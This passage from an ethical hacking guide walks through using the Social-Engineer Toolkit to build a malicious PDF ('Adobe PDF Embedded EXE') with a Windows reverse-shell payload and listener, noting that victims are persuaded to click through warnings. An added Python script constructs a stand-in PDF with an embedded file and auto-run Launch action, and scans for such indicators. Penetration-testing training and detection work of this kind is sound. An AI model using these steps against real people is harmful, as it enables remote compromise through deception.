212
◾
Ethical Hacking and Penetration Testing Guide
As we are working with file format exploits here, we will choose the first option by pressing “1” on the keyboard.
Step 3—Next, it will ask for the reverse connection IP, which will be the IP of your BackTrack box.
Step 4—Once you enter the appropriate IP, it will ask you for the type of exploit you want to use. We will choose the “Adobe PDF Embedded EXE” exploit, which we used previously with Metasploit.
Step 5—Next, it will ask whether you would like to use your own PDF or a template available in SET.
Step 6—Finally, you need to choose an appropriate payload. We will stick with the default “Windows Shell Reverse_TCP” (windows/shell/reverse_tcp) for the time being.
Step 7—Next, we need to enter the IP of our payload listener followed by the port on which our listener will run. The IP address is the same as that of our BackTrack box. You can choose any port you like; just make sure that no other service is already listening on it (a quick netstat -antp before you start will tell you).
Step 8—Finally, SET will ask whether we would like to start the listener so it can begin listening for incoming connections. Choose “Yes” and it will start the reverse handler on the port we specified. The handler must be up before the victim opens the file, or the connection attempt is simply lost.
Once the victim opens the PDF file, you will receive a reverse connection to your BackTrack box. Note that this exploit works through a Launch action, so the victim still has to click through Adobe Reader's warning dialog; the attachment name and the template text are what persuade them to do it. So now you can see how easy it is to create malicious PDF files with SET.
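As an added example (not part of the book and not SET's own code), the following Python script shows both sides of the technique at the file-format level. build_launch_pdf assembles a constructed stand-in for the kind of document the “Adobe PDF Embedded EXE” exploit produces: the payload is stored as an /EmbeddedFile stream and a /Launch action is wired to /OpenAction so it fires when the document opens. scan_pdf, embedded_files and is_suspicious are the checks a defender, or a tester validating a sample before sending it, would run over such a file: they count the telltale keywords in the raw file and inside inflated streams, and flag an attachment that starts with the MZ header of a Windows executable. All function names are mine, the attachment is a labelled text stand-in rather than a real executable, and the object layout illustrates the technique rather than reproducing SET's exact output.

```python
import re
import zlib

# Indicators the embedded-EXE technique leaves in the PDF object tree.
INDICATORS = {
    "launch_action": rb"/S\s*/Launch",           # action that runs a file or command
    "embedded_file": rb"/Type\s*/EmbeddedFile",  # attached file stream
    "open_action":   rb"/OpenAction",            # action fired when the document opens
    "javascript":    rb"/JavaScript|/JS\b",      # script-based triggers
}


def _assemble(objects):
    """Serialise numbered PDF objects with a valid xref table and trailer."""
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objects) + 1, xref_at))
    return bytes(out)


def build_launch_pdf(name, attachment):
    """Constructed stand-in (not SET output): the attachment is stored as an
    /EmbeddedFile and a /Launch action hung off /OpenAction tries to run it
    as soon as the document is opened. Illustrative structure only."""
    packed = zlib.compress(attachment)
    n = name.encode()
    return _assemble([
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R "
        b"/Names << /EmbeddedFiles << /Names [(" + n + b") 6 0 R] >> >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        (b"<< /Type /EmbeddedFile /Filter /FlateDecode /Length %d >>\nstream\n"
         % len(packed)) + packed + b"\nendstream",
        b"<< /Type /Action /S /Launch /F (" + n + b") >>",
        b"<< /Type /Filespec /F (" + n + b") /EF << /F 4 0 R >> >>",
    ])


def build_benign_pdf():
    """One blank page, no actions, no attachments: the control case."""
    return _assemble([
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
    ])


def _streams(data):
    """Yield (dictionary bytes, decoded stream bytes) for every stream object,
    inflating FlateDecode streams so keywords hidden inside compressed
    streams are visible to the scanner."""
    for chunk in data.split(b"endobj"):
        m = re.search(rb"stream\r?\n", chunk)
        if not m:
            continue
        dict_part, start = chunk[:m.start()], m.end()
        length = re.search(rb"/Length\s+(\d+)", dict_part)
        if length:
            raw = chunk[start:start + int(length.group(1))]
        else:  # no direct /Length: fall back to the endstream keyword
            raw = chunk[start:chunk.rfind(b"endstream")].rstrip(b"\r\n")
        if b"/FlateDecode" in dict_part:
            try:
                raw = zlib.decompress(raw)
            except zlib.error:
                pass  # truncated or deliberately broken stream: scan raw bytes
        yield dict_part, raw


def scan_pdf(data):
    """Count each indicator in the raw file and in every decoded stream."""
    views = [data] + [content for _, content in _streams(data)]
    return {name: sum(len(re.findall(pat, v)) for v in views)
            for name, pat in INDICATORS.items()}


def embedded_files(data):
    """Describe each embedded file; a payload starting with 'MZ' is a Windows
    executable, the strongest sign of this technique."""
    return [{"compressed": b"/FlateDecode" in d, "size": len(c), "is_pe": c[:2] == b"MZ"}
            for d, c in _streams(data) if re.search(rb"/Type\s*/EmbeddedFile", d)]


def is_suspicious(hits):
    """Triage rule: any Launch action, or an attachment paired with an automatic trigger."""
    return hits["launch_action"] > 0 or (
        hits["embedded_file"] > 0 and (hits["open_action"] > 0 or hits["javascript"] > 0))


if __name__ == "__main__":
    # Constructed sample: the "executable" is plain text that merely starts with MZ.
    sample = build_launch_pdf("update.exe", b"MZ constructed stand-in, not a real executable")
    print(scan_pdf(sample), embedded_files(sample), is_suspicious(scan_pdf(sample)))
    print(scan_pdf(build_benign_pdf()), is_suspicious(scan_pdf(build_benign_pdf())))
```

The scanner deliberately inflates every FlateDecode stream before matching, because a document that stores its action dictionaries inside a compressed object stream shows none of these keywords in a plain grep; a sample that the scanner rates clean while the reader still prompts to launch something is worth a closer look with a full PDF parser.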
That concludes our discussion on hacking with PDF. Many pentesters ignore PDF exploits, thinking they are useless; they really don't know what PDF exploits are capable of. In my view, PDF exploitation is one of the best client side exploitation techniques.